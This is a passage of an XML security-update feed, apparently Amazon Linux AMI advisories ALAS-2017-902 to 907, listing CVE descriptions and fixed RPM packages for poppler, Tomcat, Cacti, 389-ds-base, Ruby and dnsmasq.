arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.51" release="10.52.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.51-10.52.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-902</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-902: medium priority package update for poppler</title><issued date="2017-09-28 22:45:00" /><updated date="2017-09-29 21:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9776:
An integer overflow leading to heap-based buffer overflow was found in the poppler library. An attacker could create a malicious PDF file that would cause applications that use poppler (such as Evince) to crash, or potentially execute arbitrary code when opened.
1466443:
CVE-2017-9776 poppler: Integer overflow in JBIG2Stream.cc
CVE-2017-9775:
A stack-based buffer overflow was found in the poppler library. An attacker could create a malicious PDF file that would cause applications that use poppler (such as Evince) to crash, or potentially execute arbitrary code when opened.
1466442:
CVE-2017-9775 poppler: Stack-buffer overflow in GfxState.cc
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9775" title="" id="CVE-2017-9775" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9776" title="" id="CVE-2017-9776" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-cpp" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-17.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-903</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-903: medium priority package update for tomcat7 tomcat8</title><issued date="2017-10-02 16:47:00" /><updated date="2017-10-02 21:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7674:
The CORS Filter in Apache Tomcat 9.0.0.M1 to 9.0.0.M21, 8.5.0 to 8.5.15, 8.0.0.RC1 to 8.0.44 and 7.0.41 to 7.0.78 did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances.
1480618:
CVE-2017-7674 tomcat: Vary header not added by CORS filter leading to cache poisoning
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7674" title="" id="CVE-2017-7674" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.46-1.76.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-904</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-904: medium priority package update for cacti</title><issued date="2017-10-02 16:54:00" /><updated date="2017-10-02 22:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12978:
lib/html.php in Cacti before 1.1.18 has XSS via the title field of an external link added by an authenticated user.
CVE-2017-12927:
A cross-site scripting vulnerability exists in Cacti 1.1.17 in the method parameter in spikekill.php.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12927" title="" id="CVE-2017-12927" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12978" title="" id="CVE-2017-12978" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-1.17.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-905</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-905: medium priority package update for 389-ds-base</title><issued date="2017-10-02 16:55:00" /><updated date="2017-10-02 21:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7551:
A flaw was found in the way 389-ds-base handled authentication attempts against locked accounts. A remote attacker could potentially use this flaw to continue password brute-forcing attacks against LDAP accounts, thereby bypassing the protection offered by the directory server&#039;s password lockout policy.
1477669:
CVE-2017-7551 389-ds-base: Password brute-force possible for locked account due to different return codes
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7551" title="" id="CVE-2017-7551" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-libs" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.6.1-19.51.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.6.1-19.51.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.6.1-19.51.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.6.1-19.51.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.6.1-19.51.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.6.1-19.51.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.6.1-19.51.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.6.1-19.51.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.6.1-19.51.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.6.1-19.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-906</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-906: medium priority package update for ruby22 ruby23</title><issued date="2017-10-02 17:01:00" /><updated date="2018-01-18 20:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-14064:
Ruby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can expose arbitrary memory during a JSON.generate call. The issues lies in using strdup in ext/json/ext/generator/generator.c, which will stop after encountering a &#039;\\0&#039; byte, returning a pointer to a string of length zero, which is not the length stored in space_len.
1487552:
CVE-2017-14064 ruby: Arbitrary heap exposure during a JSON.generate call
CVE-2017-14033:
The decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause a denial of service (interpreter crash) via a crafted string.
1491866:
CVE-2017-14033 ruby: Buffer underrun in OpenSSL ASN1 decode
CVE-2017-10784:
The Basic authentication code in WEBrick library in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to inject terminal emulator escape sequences into its log and possibly execute arbitrary commands via a crafted user name.
1492012:
CVE-2017-10784 ruby: Escape sequence injection vulnerability in the Basic authentication of WEBrick
CVE-2017-0903:
A vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter.
1500488:
CVE-2017-0903 rubygems: Unsafe object deserialization through YAML formatted gem specifications
CVE-2017-0902:
RubyGems version 2.6.12 and earlier is vulnerable to a DNS hijacking vulnerability that allows a MITM attacker to force the RubyGems client to download and install gems from a server that the attacker controls.
1487589:
CVE-2017-0902 rubygems: DNS hijacking vulnerability
CVE-2017-0901:
RubyGems version 2.6.12 and earlier fails to validate specification names, allowing a maliciously crafted gem to potentially overwrite any file on the filesystem.
1487587:
CVE-2017-0901 rubygems: Arbitrary file overwrite due to incorrect validation of specification name
CVE-2017-0900:
RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications to cause a denial of service attack against RubyGems clients who have issued a `query` command.
1487588:
CVE-2017-0900 rubygems: No size limit in summary length of gem spec
CVE-2017-0899:
RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications that include terminal escape characters. Printing the gem specification would execute terminal escape sequences.
1487590:
CVE-2017-0899 rubygems: Escape sequence in the "summary" field of gemspec
CVE-2017-0898:
Ruby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious format string which contains a precious specifier (*) with a huge minus value. Such situation can lead to a buffer overrun, resulting in a heap memory corruption or an information disclosure from the heap.
1492015:
CVE-2017-0898 ruby: Buffer underrun vulnerability in Kernel.sprintf
CVE-2015-9096:
A SMTP command injection flaw was found in the way Ruby&#039;s Net::SMTP module handled CRLF sequences in certain SMTP commands. An attacker could potentially use this flaw to inject SMTP commands in a SMTP session in order to facilitate phishing attacks or spam campaigns.
1461846:
CVE-2015-9096 ruby: SMTP command injection via CRLF sequences in RCPT TO or MAIL FROM commands in Net::SMTP
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9096" title="" id="CVE-2015-9096" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0898" title="" id="CVE-2017-0898" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0899" title="" id="CVE-2017-0899" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0900" title="" id="CVE-2017-0900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0901" title="" id="CVE-2017-0901" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0902" title="" id="CVE-2017-0902" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0903" title="" id="CVE-2017-0903" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10784" title="" id="CVE-2017-10784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14033" title="" id="CVE-2017-14033" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14064" title="" id="CVE-2017-14064" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby22" version="2.2.8" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-2.2.8-1.9.amzn1.x86_64.rpm</filename></package><package name="ruby22-devel" version="2.2.8" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-devel-2.2.8-1.9.amzn1.x86_64.rpm</filename></package><package name="ruby22-irb" version="2.2.8" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-irb-2.2.8-1.9.amzn1.noarch.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.8" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-debuginfo-2.2.8-1.9.amzn1.x86_64.rpm</filename></package><package name="rubygems22-devel" version="2.4.5.2" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-devel-2.4.5.2-1.9.amzn1.noarch.rpm</filename></package><package name="rubygems22" version="2.4.5.2" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-2.4.5.2-1.9.amzn1.noarch.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.9.amzn1.x86_64.rpm</filename></package><package name="ruby22-libs" version="2.2.8" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-libs-2.2.8-1.9.amzn1.x86_64.rpm</filename></package><package name="ruby22-doc" version="2.2.8" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-doc-2.2.8-1.9.amzn1.noarch.rpm</filename></package><package name="rubygem22-psych" version="2.0.8.1" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-psych-2.0.8.1-1.9.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-io-console-0.4.3-1.9.amzn1.x86_64.rpm</filename></package><package name="ruby22-libs" version="2.2.8" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-libs-2.2.8-1.9.amzn1.i686.rpm</filename></package><package name="rubygem22-psych" version="2.0.8.1" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-psych-2.0.8.1-1.9.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.8" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-debuginfo-2.2.8-1.9.amzn1.i686.rpm</filename></package><package name="ruby22" version="2.2.8" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-2.2.8-1.9.amzn1.i686.rpm</filename></package><package name="ruby22-devel" version="2.2.8" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-devel-2.2.8-1.9.amzn1.i686.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-io-console-0.4.3-1.9.amzn1.i686.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.9.amzn1.i686.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-json-1.8.3.1-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby23-doc" version="2.3.5" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-doc-2.3.5-1.17.amzn1.noarch.rpm</filename></package><package name="rubygem23-did_you_mean" version="1.0.0" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-did_you_mean-1.0.0-1.17.amzn1.noarch.rpm</filename></package><package name="rubygems23-devel" version="2.5.2.1" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-devel-2.5.2.1-1.17.amzn1.noarch.rpm</filename></package><package name="rubygems23" version="2.5.2.1" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-2.5.2.1-1.17.amzn1.noarch.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-debuginfo-2.3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-psych-2.1.0.1-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby23-libs" version="2.3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-libs-2.3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby23-irb" version="2.3.5" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-irb-2.3.5-1.17.amzn1.noarch.rpm</filename></package><package name="ruby23" version="2.3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-2.3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.17.amzn1.x86_64.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-io-console-0.4.5-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby23-devel" version="2.3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-devel-2.3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-psych-2.1.0.1-1.17.amzn1.i686.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-io-console-0.4.5-1.17.amzn1.i686.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-json-1.8.3.1-1.17.amzn1.i686.rpm</filename></package><package name="ruby23-devel" version="2.3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-devel-2.3.5-1.17.amzn1.i686.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-debuginfo-2.3.5-1.17.amzn1.i686.rpm</filename></package><package name="ruby23" version="2.3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-2.3.5-1.17.amzn1.i686.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.17.amzn1.i686.rpm</filename></package><package name="ruby23-libs" version="2.3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-libs-2.3.5-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-907</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-907: critical priority package update for dnsmasq</title><issued date="2017-10-02 17:05:00" /><updated date="2017-10-02 21:47:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-14496:
An integer underflow flaw leading to a buffer over-read was found in dnsmasq in the EDNS0 code. An attacker could send crafted DNS packets to dnsmasq which would cause it to crash. This issue only affected configurations using one of the options: add-mac, add-cpe-id, or add-subnet.
1495416:
CVE-2017-14496 dnsmasq: integer underflow leading to buffer over-read in the EDNS0 code
CVE-2017-14495:
A memory exhaustion flaw was found in dnsmasq in the EDNS0 code. An attacker could send crafted DNS packets which would trigger memory allocations which would never be freed, leading to unbounded memory consumption and eventually a crash. This issue only affected configurations using one of the options: add-mac, add-cpe-id, or add-subnet.
1495415:
CVE-2017-14495 dnsmasq: memory exhaustion vulnerability in the EDNS0 code
CVE-2017-14494:
An information leak was found in dnsmasq in the DHCPv6 relay code. An attacker on the local network could send crafted DHCPv6 packets to dnsmasq causing it to forward the contents of process memory, potentially leaking sensitive data.
1495412:
CVE-2017-14494 dnsmasq: information leak in the DHCPv6 relay code
CVE-2017-14493:
A stack buffer overflow was found in dnsmasq in the DHCPv6 code. An attacker on the local network could send a crafted DHCPv6 request to dnsmasq which would cause it to a crash or, potentially, execute arbitrary code.
1495411:
CVE-2017-14493 dnsmasq: stack buffer overflow in the DHCPv6 code
CVE-2017-14492:
A heap buffer overflow was discovered in dnsmasq in the IPv6 router advertisement (RA) handling code. An attacker on the local network segment could send crafted RAs to dnsmasq which would cause it to crash or, potentially, execute arbitrary code. This issue only affected configurations using one of these options: enable-ra, ra-only, slaac, ra-names, ra-advrouter, or ra-stateless.
1495410:
CVE-2017-14492 dnsmasq: heap overflow in the IPv6 router advertisement code
CVE-2017-14491:
A heap buffer overflow was found in dnsmasq in the code responsible for building DNS replies. An attacker could send crafted DNS packets to dnsmasq which would cause it to crash or, potentially, execute arbitrary code.
1495409:
CVE-2017-14491 dnsmasq: heap overflow in the code responsible for building DNS replies
